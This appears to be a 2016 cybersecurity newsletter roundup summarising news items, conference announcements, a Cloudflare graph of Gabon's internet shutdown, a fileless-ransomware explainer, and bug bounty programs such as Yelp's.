Reports and evaluations
The recent G20 economic summit
held in China had numerous discussions about economic cooperation among the member nations, but one item not on the agenda was how to fight cyber crime. Apart from a brief mention in a meeting between Obama and Putin, it wasn’t addressed at all. This post looks at various nation-on-nation attacks over the recent past and suggest that the world leaders “should also have addressed cybersecurity issues that pose such large and growing economic and strategic threats.” – DEFENSE ONE
The flight of Ed Snowden from Hong Kong to Russia is mostly well known, and a new Oliver Stone movie
will be out this week about the NSA leaker. But what is less well known is how his escape was engineered. In this post, the principals involved in getting him out of Hong Kong were interviewed and tell how he was hidden and transported to different apartments before leaving the country and then having his passport revoked. – NATIONAL POST
One unexpected pairing is the Consumer Product Safety Commission’s DNS resolver and its use in DDoS attacks
. This report from security researchers shows how attackers can use the CPSC DNS servers to amplify their activities, since it returns a very large record in response to queries. Researchers have found the CSPC servers present in nearly all of their observed DNS hacks.– CLOUDFLARE BLOG
OPSWAT is a great resource for security education and their upcoming (and free!) Symposium in Silicon Valley later this month should be on your radar
. They will provide updates on their tools such as Metadefender
along with vendor demos and malware research. – CONFERENCE SITE
Global cybercrime-fighting association APWG.EU
is hosting its eCrime 2016 program on October 5-7 in Bratislava, Slovakia, presenting advanced data analysis and data exchange schemes to automate the global response to cybercrime. – CONFERENCE SITE
The National Initiative for Cybersecurity Education is having their annual conference November 1 in Kansas City.
The event features two days’ worth of public/private executives and stakeholders in infosec education, sponsored by the National Institute of Standards and the US Department of Commerce. Keynotes are by the founder of Opportunity@Work, and the president of BAE Systems. – NICE CONFERENCE SITE
This blog has put together a nice list of noteworthy NYC-based infosec events called Empire Hacking.
As they say, “ industry professionals have much to learn from emerging academic innovations and we hope to bring them together.” – TRAIL OF BITS BLOG
Graphs of the week
Ever wondered what it looks like when an entire country goes offline? Here you go. The folks at Cloudflare have tracked the blackout happening in Gabon. Reuters reports
political unrest and massive rioting after a contested election. After turning off the Internet for several days, the government has imposed 12-hour Internet curfews
each evening, as you can see in the graphic. -- CLOUDFLARE
Here is how fileless ransomware typically works
, where malware is embedded into a scripting language or written straight to memory, using Powershell commands. – CROWDSTRIKE BLOG
Noteworthy podcasts and webinars
This 25-minute video shows you how local administrator attacks were used to spread attacks inside a enterprise.
, they explain how it works and how to stop it
. The video tutorial is based on their experience of a hundred different white-hat attacks. This is one of a series of other attacks they have produced videos on. – PRAETORIAN
Bug-finding programs are valuable to enterprises, but they require a lot of planning and effort to be effective
. Here is what you need to know before you implement a bounty program
, including specific focus, how to work with security researchers, how much to offer as a bounty, whether to emply a third-party bounty management vendor and other elements. -- SEARCHSECURITY
This week Yelp announced its own bug bounty program.
, they will offer up to $15,000 for proven vulnerabilities. This expands a private program they have been running for two years that previously had a top bounty of $2000 and payouts of more than $65,000. The scope of the new program will include Yelp's consumer site, its business owner's site, mobile apps, its reservations site and apps, the firm's public API, support site, and its blogs. –DARK READING
Just for fun
Love those Apple ads and can speak Russian?
Then you might enjoy this post, which talks about a new political campaign ad that spoofs the sparse simplicity of Apple that is running right now in Russia. -- BBC
Here is how the Mozilla community can be a good first step
for newbie open source developers. It is more informative than funny, but still interesting to read how this one developer got her way into becoming more influential within one community. – DEV.TO